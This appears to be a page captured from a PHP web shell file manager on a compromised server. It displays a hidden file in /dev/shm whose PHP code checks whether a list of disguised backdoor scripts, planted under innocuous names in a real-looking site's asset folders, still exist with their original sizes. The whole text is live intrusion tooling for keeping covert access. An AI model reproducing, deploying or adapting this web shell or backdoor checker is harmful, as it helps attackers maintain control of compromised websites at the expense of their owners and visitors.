D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
proc
/
thread-self
/
root
/
dev
/
shm
/
Filename :
.hld
back
Copy
<?php $r = '/home/olsoruwm/olsonmhp.com'; $x = ["/nc_assets/img/pictograms/150/Server.php"=>"bd@@424968@@620", "/nc_assets/img/featured/600/index~.php"=>"bd@@425008@@924", "/bnspeow/ybgnjt1/tirf1bz/typoscript.php"=>"bd@@406843@@623", "/nc_assets/img/logos/pda.php"=>"bd@@406863@@1022", "/wtvnkgf/nktswdm/pnhwjbk/cache_smilies.php"=>"bd@@405584@@596", "/1uxbocm/ovfitqw/y1gruzl/estero_mod.php"=>"bd@@406869@@927", "/oefsq1k/cjd1nhm/rhbvalt/sample02.php"=>"bd@@425048@@626", "/nc_assets/img/pictograms/index.clicks.php"=>"bd@@425091@@886", "/hpx1sfq/cmfyxja/fhkyzda/Doctype.php"=>"bd@@405637@@1020", "/nc_assets/img/icons/cma_m_scheduled.php"=>"bd@@425165@@721", "/bqjahip/zxvwbq1/kjghlnv/xoops_version.php"=>"bd@@406903@@601"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');